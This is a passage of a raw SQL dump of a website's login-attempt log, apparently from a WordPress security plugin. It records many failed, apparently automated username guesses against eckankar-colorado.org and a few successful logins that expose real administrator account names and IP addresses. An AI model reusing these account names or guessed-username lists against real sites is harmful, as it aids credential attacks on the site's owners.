Mobile Safari/537.36'),(18637,111309,1691987311.661152,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFFAAF53BF9,'Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G996U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18638,111310,1691987315.137679,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFFCA7C203A,'Mozilla/5.0 (Linux; Android 9; G8341) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.62 Mobile Safari/537.36'),(18639,111318,1691995300.705274,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBB106D79,'Mozilla/5.0 (Linux; Android 11; SM-S506DL) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18640,111319,1691995304.677638,1,'loginFailInvalidUsername','c-admin',0,0x00000000000000000000FFFF5BCAE69C,'Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18641,111320,1691995305.997209,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFF6BADA453,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Mobile/15E148 Safari/604.1'),(18642,111321,1691995308.852748,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFF66A4F8D8,'Mozilla/5.0 (Linux; Android 10; SM-N960U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 Mobile Safari/537.36'),(18643,111322,1691995310.297098,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF604DCEBE,'Mozilla/5.0 (Linux; Android 9; SM-G955U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18644,111323,1691995311.992651,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFF58F72944,'Mozilla/5.0 (Linux; Android 12; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18645,111324,1691995321.010361,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFF700BF18C,'Mozilla/5.0 (Linux; Android 12; Pixel 4a (5G)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18646,111328,1691999984.676289,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C7ACB7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(18647,111329,1691999985.523747,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF80C7ACB7,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'),(18648,111332,1692001122.153828,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF80C9DC52,'Mozilla/5.0 (Linux; Android 10; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18649,111333,1692001129.089217,1,'loginFailInvalidUsername','c-admin',0,0x00000000000000000000FFFF76AC36E9,'Mozilla/5.0 (Linux; Android 11; SM-A326U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18650,111334,1692001131.615570,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFF52D755C7,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15'),(18651,111335,1692001133.769563,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFF45C13A8E,'Mozilla/5.0 (Linux; Android 11; SM-N970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18652,111336,1692001135.802842,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF41148FE0,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 OPR/82.0.4227.43'),(18653,111337,1692001137.607151,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFF18A048A9,'Mozilla/5.0 (Linux; Android 12; Pixel 3a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18654,111338,1692001139.418667,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFF8A2417B7,'Mozilla/5.0 (Linux; Android 12; SM-N975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18682,111484,1692091729.227545,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18683,111485,1692091729.466689,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18684,111486,1692091729.689812,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18685,111487,1692092630.342928,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18686,111488,1692092630.581659,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18687,111489,1692092630.809259,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18688,111490,1692092631.034763,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18689,111491,1692092631.253175,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18690,111492,1692092631.472657,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18691,111493,1692092631.698002,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18612,111261,1691947220.527415,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFF6EEBFCD6,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Mobile/15E148 DuckDuckGo/7 Safari/605.1.15'),(18613,111262,1691947222.835359,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF5048B3B2,'Mozilla/5.0 (Linux; Android 11; GM1915) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18614,111263,1691947225.286495,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFF67E5A6FE,'Mozilla/5.0 (Linux; Android 10; Nokia 9) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36 EdgA/96.0.1054.62'),(18615,111264,1691947227.111865,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFF5F6BD82B,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Mobile/15E148 Safari/604.1'),(18616,111265,1691947229.055230,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFFB9E9B6F6,'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36'),(18617,111277,1691974147.801242,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF294C9A76,'Mozilla/5.0 (Linux; Android 12; Pixel 5a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Mobile Safari/537.36 EdgA/96.0.1054.62'),(18618,111278,1691974154.938356,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF245814DA,'Mozilla/5.0 (Linux; Android 10; SM-A600AZ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18619,111279,1691974156.490799,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFB073645F,'Mozilla/5.0 (Linux; Android 11; SM-G981W) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18620,111280,1691974159.094003,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFB165E90E,'Mozilla/5.0 (Linux; Android 10; SAMSUNG SM-G965U1) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18621,111281,1691974160.549306,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFA63E5C44,'Mozilla/5.0 (Linux; Android 11; SM-G988U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Mobile Safari/537.36'),(18622,111282,1691974162.693675,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFA0F80AA3,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1'),(18623,111283,1691974165.253087,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF2DC986E1,'Mozilla/5.0 (Linux; Android 11; SM-F926U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18624,111287,1691982804.228322,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFF6732D71E,'Mozilla/5.0 (Linux; Android 10; moto e (XT2052DL)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18692,111503,1692099972.737316,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF6EEBF922,'Mozilla/5.0 (Linux; Android 11; motorola edge 5G UW (2021)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18693,111504,1692099976.913855,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF73722869,'Mozilla/5.0 (Linux; Android 10) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile DuckDuckGo/5 Safari/537.36'),(18694,111505,1692099979.240360,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFA7B3288A,'Mozilla/5.0 (Linux; Android 10; LM-Q720) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18695,111506,1692099981.136624,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFD47D1867,'Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18696,111507,1692099983.836673,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF72842DDE,'Mozilla/5.0 (Linux; Android 11; moto g pure) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18732,111665,1692195385.945791,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFBA61DCBA,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18733,111666,1692195391.403328,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFFB3E4C125,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18734,111667,1692195393.631330,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFB6343965,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18610,111259,1691947186.752475,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFFB570E60A,'Mozilla/5.0 (Linux; Android 8.1.0; SM-T378V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Safari/537.36'),(18611,111260,1691947218.349272,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFFBCA5DC32,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_7 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/194.0.419363360 Mobile/15E148 Safari/604.1'),(18735,111668,1692195396.088282,1,'loginFailInvalidUsername','username',0,0x00000000000000000000FFFF7AB9DC76,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18736,111669,1692195402.092798,1,'loginFailInvalidUsername','wordpress',0,0x00000000000000000000FFFF3122E712,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18737,111670,1692195403.717355,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF29FB6612,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18738,111672,1692196708.669327,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF3CF81C6D,'Mozilla/5.0 (Linux; Android 11; SM-A516U Build/RP1A.200720.012; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/96.0.4664.104 Mobile Safari/537.36 [FB_IAB/Orca-Android;FBAV/342.1.0.14.119;]'),(18739,111673,1692196711.634003,1,'loginFailInvalidUsername','developer007',0,0x00000000000000000000FFFFB3BDE9AE,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.131 Safari/537.36'),(18727,111660,1692195373.410446,1,'loginFailInvalidUsername','password!',0,0x00000000000000000000FFFF6E8A5EC4,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18728,111661,1692195375.360996,1,'loginFailInvalidUsername','eckankar-colorado',0,0x00000000000000000000FFFF299B0818,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18729,111662,1692195377.851248,1,'loginFailInvalidUsername','admin!',0,0x00000000000000000000FFFFB12D5B68,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18663,111433,1692059024.667367,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFFCA2BA58A,'Mozilla/5.0 (iPad; CPU OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/187.0.410885375 Mobile/15E148 Safari/604.1'),(18664,111434,1692059027.861392,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFFDDDB8734,'Mozilla/5.0 (Linux; Android 11; SM-A205U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.88 Mobile Safari/537.36'),(18665,111452,1692070806.787932,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1082D1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18666,111462,1692080603.603824,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFFC88E65C4,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.55'),(18667,111463,1692080631.663263,1,'loginFailInvalidUsername','c-admin',0,0x00000000000000000000FFFFBE9386C4,'Mozilla/5.0 (Linux; Android 10; LM-G710) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18668,111464,1692080634.879965,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFF2D05C090,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/96.0.4664.116 Mobile/15E148 Safari/604.1'),(18669,111465,1692080638.283560,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF67EF349D,'Mozilla/5.0 (Linux; Android 11; SM-A015A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18670,111466,1692080640.733724,1,'loginFailInvalidUsername','rene',0,0x00000000000000000000FFFFAC6E941B,'Mozilla/5.0 (Linux; Android 11; SM-N970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18671,111467,1692080642.186024,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFF5BE0815D,'Mozilla/5.0 (Linux; Android 12; SM-G998U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18672,111468,1692080644.214736,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFF1F92FA2A,'Mozilla/5.0 (Linux; Android 11; SM-A207M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18673,111475,1692091726.580509,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18674,111476,1692091727.375099,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18675,111477,1692091727.628802,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18676,111478,1692091727.850084,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18677,111479,1692091728.070651,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18678,111480,1692091728.308656,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18679,111481,1692091728.548544,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18680,111482,1692091728.776592,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18681,111483,1692091729.005869,1,'loginFailInvalidUsername','monika',0,0x00000000000000000000FFFF14E717C1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18730,111663,1692195382.087642,1,'loginFailInvalidUsername','eckankar-colorado!',0,0x00000000000000000000FFFFB55EF8EE,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18731,111664,1692195384.136576,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF6EE2B414,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36'),(18658,111428,1692059009.755308,1,'loginFailInvalidUsername','editor',0,0x00000000000000000000FFFFD58871DB,'Mozilla/5.0 (Linux; Android 8.1.0; SM-T378V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Safari/537.36'),(18659,111429,1692059014.791654,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFFBEF892AA,'Mozilla/5.0 (Linux; Android 12; SM-G781V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18660,111430,1692059017.346623,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF74D48471,'Mozilla/5.0 (Linux; Android 11; moto g power (2022)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(18661,111431,1692059020.108989,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFF41149642,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_2_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.1 Mobile/15E148 Safari/604.1'),(18662,111432,1692059021.844139,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFF32074212,'Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.185 Mobile Safari/537.36'),(18892,113130,1692787186.018583,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF2D201A08,'Mozilla/5.0 (Linux; Android 11; SAMSUNG SM-S205DL) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36'),(18893,113133,1692788642.321771,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF05878839,'Mozilla/5.0 (Linux; Android 11; moto g stylus) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18894,113134,1692788644.660418,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF411489C0,'Mozilla/5.0 (Linux; Android 11; SM-N976U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18895,113135,1692788646.276984,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFFC1CBD196,'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(18896,113136,1692788654.247183,1,'loginFailInvalidUsername','lukas',0,0x00000000000000000000FFFFDF4907C6,'Mozilla/5.0 (Linux; Android 12; SM-G781V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile Safari/537.36'),(18897,113137,1692788656.311188,1,'loginFailInvalidUsername','xxx',0,0x00000000000000000000FFFFBEBB56EA,'Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/196.0.423110124 Mobile/15E148 Safari/604.1'),(18898,113138,1692788658.560809,1,'loginFailInvalidUsername','zero',0,0x00000000000000000000FFFF75FB67BA,'Mozilla/5.0 (Linux; Android 5.1.1; KFSUWI) AppleWebKit/537.36 (KHTML, like Gecko) Silk/96.1.237 like Chrome/96.0.4664.128 Safari/537.36'),(18899,113139,1692788660.639281,1,'loginFailInvalidUsername','ccc1',0,0x00000000000000000000FFFF5F6BD82B,'Mozilla/5.0 (Linux; Android 10; moto z4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.98 Mobile Safari/537.36'),(19002,116029,1693305831.049288,1,'loginFailInvalidUsername','henri',0,0x00000000000000000000FFFF7B3AD9EE,'Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G891A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18697,111524,1692118265.574397,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF284D0D84,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18698,111525,1692118266.475434,1,'loginFailInvalidUsername','admin',0,0x00000000000000000000FFFF284D0D84,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18699,111530,1692125030.191809,0,'loginOK','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18700,111531,1692127845.725666,1,'loginFailInvalidUsername','info@eckankar-colorado.org',0,0x00000000000000000000FFFF55EE6498,'Mozilla/5.0 (Linux; Android 11; SM-A526U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/537.36'),(18701,111532,1692127851.861142,1,'loginFailInvalidUsername','c-admin',0,0x00000000000000000000FFFF3D0793FC,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36/myGIRDzA-32'),(18702,111533,1692127853.918064,1,'loginFailInvalidUsername','wp',0,0x00000000000000000000FFFFBE0EED59,'Mozilla/5.0 (Linux; Android 11; Mi Note 10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18703,111534,1692127856.887325,1,'loginFailInvalidUsername','pws',0,0x00000000000000000000FFFFDF4907D6,'Mozilla/5.0 (Linux; Android 11; SM-N970U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18704,111535,1692127859.748406,1,'loginFailInvalidUsername','coco',0,0x00000000000000000000FFFF6781D5AF,'Mozilla/5.0 (Linux; Android 11; LM-V600) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18705,111536,1692127872.136213,1,'loginFailInvalidUsername','boss',0,0x00000000000000000000FFFFA7B32C1B,'Mozilla/5.0 (Linux; Android 11; LM-K920) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.70 Mobile Safari/537.36'),(18706,111537,1692127875.163490,1,'loginFailInvalidUsername','f-admin',0,0x00000000000000000000FFFF66B104AC,'Mozilla/5.0 (Linux; Android 11; LE2125) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.104 Mobile Safari/537.36'),(18707,111538,1692133485.266205,0,'logout','S8zhaBda',2,0x00000000000000000000FFFF4C8278C6,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18708,111550,1692149923.142358,1,'loginFailInvalidUsername','olufunmi',0,0x00000000000000000000FFFF87B58F1D,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36'),(18709,111553,1692151310.942638,0,'loginOK','john-admin-96',15,0x00000000000000000000FFFFAE1082D1,'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36'),(18710,111610,1692155933.123686,1,'loginFailInvalidUsername','admin@eckankar-colorado.org',0,0x00000000000000000000FFFF6E4E1BA1,'Mozilla/5.0 (iPhone; CPU iPhone OS 14_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) GSA/190.1.416438978 Mobile/15E148 Safari/604.1'),(18711,111611,1692155967.674474,1,'loginFailInvalidUsername','armani',0,0x00000000000000000000FFFF561A1545,'Mozilla/5.0 (Linux; Android 11; SM-G975U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.87 Mobile 